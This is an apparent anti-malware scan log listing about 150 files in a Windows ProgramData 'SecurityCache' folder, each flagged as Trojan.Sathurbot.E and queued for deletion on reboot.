Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ddbecfa53bce79286cf9a44b4d6c6c90, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de177bcd62fd5092202343daceab8714, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\de957e4f995aaddbf21a460ac6d6bf6d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\548509c4cb148f0dc069d61e4191e2d9, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\55608f6aefba4db7458a652a79a15c92, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\56b05055acf8caa94b019cad0d058ca3, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\573376c678cdf8388e8ca569e6a3f42b, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\577a157404a9c2bfa0ed3b91f432239c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\580b8e805f78816a32ad46a2d30c4501, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5ad8fa78eabe15893d3376c8c500e258, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5afc95652210998bd40844db7075e204, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6dcba063d23763207581bb52dacb051, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6e8ba69ae6d2e1eaa905bca8e6d90ff, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a72f77f761f89e309c894b03d2e7bd4c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ad8eefaf5286cbec0bb75eaf1b2ffb47, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af5a4f550df3e39b45118d0d96b32d4d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af9461fa3a552f3ca0478dcfc0ac362a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b5becf525befbe03d39413cf887d1417, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b6d721cc81888d2fc338219aee682db8, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6754cfecae61493964516786e862034a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\be57846cb109cd96783d9a09e8d76664, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a63c101ceef39a9d9ba8542329670eb6, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c14debd37305c8b9ee44aaba46212b4f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c569574822bef5c4d80349b4230032cd, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2c89325d0d3f197b28dfd6d7b3c47dd, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\df99cab0dad57776f1c2ff98e43905ba, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ece31a64f1410072be86549af78ad112, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22501a12640e0d2eacdf764df1625909, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22c18af08e624e272bd4f1ae69f33d99, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2393dd19a8c1e641f1a6d74c8d2683f1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24487c94123c38ad51f71f3c5f17e6db, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24956a069784f3ee4da71dc6b3b6709c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2513dc81a92b9c05964b6fb577b29a92, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\25856f397a70bac6d97a0590bb1daf27, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2589dfd756006a29a162ca3059761bd6, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26ba1fe505f5eb72eb8b08b07b9d2633, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26def096d365a8ee4277c5319f81ab58, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\28d94aa8445f8afba3336edb1c27b14c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\85524c5aa24a5a95e16b6e1c4cff571d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8758a28d48ed0a7839dc483fbd6f7129, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\88f798ca90cbd3179f8c504a8fd6a1af, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8a1156fd41d78cd113ac0549e754baa2, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8afb95ef0d1220d23b9623bffcb9ff57, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8b609eedd6bb25c595cd09546420db93, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8da3583b712916b4cac4f9f3f02fdaeb, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9090ad3a074b1da3fdf2b2aab969e097, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\915c0ea71bd2103634fb93120059f2d0, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\920c265457f24c84dad5cc6f91f841e4, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c5e7172ccbca5ee12ccec8dbfbb0a916, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c7db0c3f907b23bfa8df0829534cc38e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ca5e0d1ed3240ff21f1ae59191855325, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc245c8e4392379c24dc19aa1df88b76, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc6b0cf1d835f721d67b8e62a3e764e5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cddb6acc16ff9137398363bbe03263de, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ce09e7ac485e61a20d82d8fa43a506a3, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cfe2d42980cc06cdf0bbfd4e6960915b, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d031285af48b90962abac2afc48200b5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d04cb8eb0f0b9d030a0eae397e515d1a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1a43a55c3bda34650bb9294a135abc2, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1eb47beb4f311fd481d357ab3456b07, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2bed49e2a2d86016d8993a01ab552d5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6794318076f8df2ddbbdd4ff7927f10a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\67dedcd9029bac22b3f63083e26a814f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\681d1c56fefdf5064964d65ffe5a6be3, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\682b108f4d7b74c1ad51b38ce08dcd5e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\691fcacc02bc1047e58a2e80d2739b75, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\696acdc18471bad4e7424cb0996099cc, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\69e3c3a6e946adc33bfe8c0e961954a2, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a261f1464cdce0b33f8f4ecd1d1ddd4, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a3c00af9c87188194351bfb60e888a9, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a50c4bc3eadcd483eedf1b30935e613, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6c5cb2fc9f84db9de134598a02912f6e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6cf1a4221dc6831c0b264d2888c75720, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6d6351fb46b5fe461f13a94f6cb339ea, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6dbdd2e5f83e8cca4603bb59843899d5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6e994f8d30ada5c4aed6d24b44b537ca, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\74b666ebf6a455763d405af8b4d798a7, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c1422ca03ba9542755cb7e8fd271330, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c9e79246325a3d103cd13657e07eb39, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3cd8f1ad7174b0259114330ea573eb2c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3fd3c85733e1d00b4a694b5d187b6474, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\423156f65de615cf4d01c2c42eb03db1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\437b623652da5458a6c67b00c53868f5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\44c20a4c35790e24de6161561fdbb077, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4678b4edab6ca6b6701cf31cf9568704, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46d4977b73223dab65141204322efc51, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ed39a6eb8cb42d567573ebdb6ca27c61, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f132b912ea3f8097762b256293a9953a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f35e906c7e6c3b68f0285005195eec52, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f751683de03ade9e0920b62cc8542e6e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f7bcab5dace78283b9f759005152de8d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f86dbdd379fae926a612a144d5ecce69, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f97beeb0ed48210ef8858bff00bb7d18, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f9b5675e6579d5e98b41312ae6345199, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fa22a82b1df7b08df25803806bd9694f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\faaee814b82c2a36f06e40af075cb5c1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fc7160b2565bdcc8382fa74e43495799, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fd2c8238c0e8ea5bd3ea58d9470224f5, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe75751f0e65f636df55620338ed3cd1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe9fbb1ce8e35f5400c89d9ce9f5db14, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fefdd2265913197c649c88a119955d59, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\941762a0c5862a72a0aa2c1995d754f8, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95c9e8535d09b813fef20e7d0a371b31, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95e95d42d69637efd05a05d594525553, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\965c44f802aeda450496a2811908ddbb, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\98aa80db2acbfe37a9f978c6b6c0920a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9a1ed8766c859a2a21ff3cba26f0b166, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9bba2f1e69982976340996427e7778a0, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9eb5b6e6ae69e3bc13cc76f94dd6fded, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a1950e3528b0871ee6f1e0891096f785, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a544aaf5c59dbfc473ac2e3ad7274d53, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a5825cb12a9a21ab824c133c72022a90, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\183fb8947af66b4e00cfe938ccb4b40c, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\18927ccfded0d0bce2c25484315d2550, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1bf8ddd876682be4149bc49e2386fa37, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1ca0d14fa7448c8f80cd2be26548ab3d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1d3257c5e4c8f8afa1263428ef788e06, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1e96dc0081d605db4607f655335d70f8, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1f11c252718b0dceea8f4e6def7fbe79, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\20cf9543585b13f565de6ba5ba81b1fa, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c1e5440a8ad280d66ce37cd683132035, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2515841ede50ad5241889b3a5239af1, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2ca803de5ea15aebc24dfb31e46ff88, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3334816313242fc3a4fcc7650a14d9d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c35c62bbfd5815621772ca046abafe5e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b439f57d05edb948574b50b8fa59fb, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b69c6a946666dd8ca776ad800ff836, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4fcb2f1b6686cd04f82bcf02314f6ae, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dee4e623d06c82f12da1b32d739e055, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7e8f4bb2dce979fd6160cd928709b045, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f57ffcf705c68eb438cc6f35c7cc0a6, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f8f40c8cecb5de0ae30e927174121d3, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\80314d336e5581f4825c25bafd0b2f67, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8071b2e0bda3117347f54c0380caa9be, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\82f6e91ee379a279953b0f5cc542f6b0, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\830a7e836dc5f626f298ba8f5f4ef5ab, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\83ae0e7e209219becd1e7bb3057b4a11, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8518a46f9fcad1ca962b282ae0145c40, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2abc6f3e0a5236dc6f62668ff5bc4e33, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2af68deceeb5865b945c578b9ee63cc4, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2c7c602718049c67e933ffa40e5da42e, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2f1e4664911cc42c367ca2875ddb2ff9, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\330e3d5b4ae8d0b769873c425c01c913, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3367a180a64bb4b31da2d6965f49c613, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\345dbb1e10eb304f47c293bbd8b06e5d, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\350faf47d3ddd37a10d22bd00961ec33, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\389bded36d89adf971ebc258373fa5cf, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46f944387ed36384118d8623f6e1531b, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\483c4d526d59228c7d0d68d085fbe81a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\492f2347112f091a4eb2e43788498cad, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4b468578921d69825db9f3c80678664b, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4c7fc889b07f3fae40526a7f39ac34dd, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4cfccf2b7ab56112367e4add655165ed, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4d26033c23c5eb763dc97044da803b3f, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52103c6d72a58fcc5177ba768e10d13a, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\52a38425d712166eee12e8bf380ea984, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\e099fdbf84410511c0f424d389fc60a2, Delete-on-Reboot, [2851], [355073],1.0.1064
